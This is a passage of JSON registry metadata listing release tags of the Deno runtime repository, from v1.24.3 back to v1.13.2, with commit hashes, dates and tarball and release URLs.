61f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.co